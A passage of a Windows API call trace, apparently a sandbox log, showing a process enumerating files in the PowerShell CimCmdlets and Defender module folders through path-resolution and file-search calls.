nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0176.892] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0176.892] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592a30 [0176.892] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.892] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0176.892] FindNextFileW (in: hFindFile=0x1a592a30, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.892] FindClose (in: hFindFile=0x1a592a30 | out: hFindFile=0x1a592a30) returned 1 [0176.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.893] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0176.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.893] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0176.893] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.893] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0176.893] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\", lpFilePart=0x0) returned 0x3e [0176.893] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.893] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.893] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 1 [0176.894] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets.psd1", cAlternateFileName="")) returned 0 [0176.894] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de4c0) returned 1 [0176.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de480) returned 1 [0176.894] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0176.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.895] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0176.895] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0176.895] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592010 [0176.897] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.897] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0176.897] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0176.898] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0176.898] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0176.898] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0176.898] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0176.898] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0176.899] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0176.899] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0176.899] FindNextFileW (in: hFindFile=0x1a592010, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 0 [0176.899] FindClose (in: hFindFile=0x1a592010 | out: hFindFile=0x1a592010) returned 1 [0176.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de510) returned 1 [0176.900] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0176.900] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b7ddfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0176.900] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b7de1b0 | out: lpFindFileData=0x1b7de1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592850 [0176.901] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.901] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender.psd1", cAlternateFileName="")) returned 1 [0176.901] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpComputerStatus.cdxml", cAlternateFileName="")) returned 1 [0176.902] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8f67, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpPreference.cdxml", cAlternateFileName="")) returned 1 [0176.902] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x71d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpScan.cdxml", cAlternateFileName="")) returned 1 [0176.902] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpSignature.cdxml", cAlternateFileName="")) returned 1 [0176.902] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x597, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreat.cdxml", cAlternateFileName="")) returned 1 [0176.902] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatCatalog.cdxml", cAlternateFileName="")) returned 1 [0176.903] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x39d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpThreatDetection.cdxml", cAlternateFileName="")) returned 1 [0176.903] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_MpWDOScan.cdxml", cAlternateFileName="")) returned 1 [0176.903] FindNextFileW (in: hFindFile=0x1a592850, lpFindFileData=0x1b7de200 | out: lpFindFileData=0x1b7de200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0176.903] FindClose (in: hFindFile=0x1a592850 | out: hFindFile=0x1a592850) returned 1 [0176.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de460) returned 1 [0176.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de420) returned 1 [0176.904] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7de100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0176.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de540) returned 1 [0176.904] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender"), fInfoLevelId=0x0, lpFileInformation=0x1b7de620 | out: lpFileInformation=0x1b7de620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0176.904] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de500) returned 1 [0176.904] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de570) returned 1 [0176.904] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", nBufferLength=0x105, lpBuffer=0x1b7de060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender", lpFilePart=0x0) returned 0x3b [0176.904] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", nBufferLength=0x105, lpBuffer=0x1b7de000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\", lpFilePart=0x0) returned 0x3c [0176.905] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\*", lpFindFileData=0x1b7de210 | out: lpFindFileData=0x1b7de210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a592790 [0176.906] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0176.906] FindNextFileW (in: hFindFile=0x1a592790, lpFindFileData=0x1b7de260 | out: lpFindFileData=0x1b7de260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, 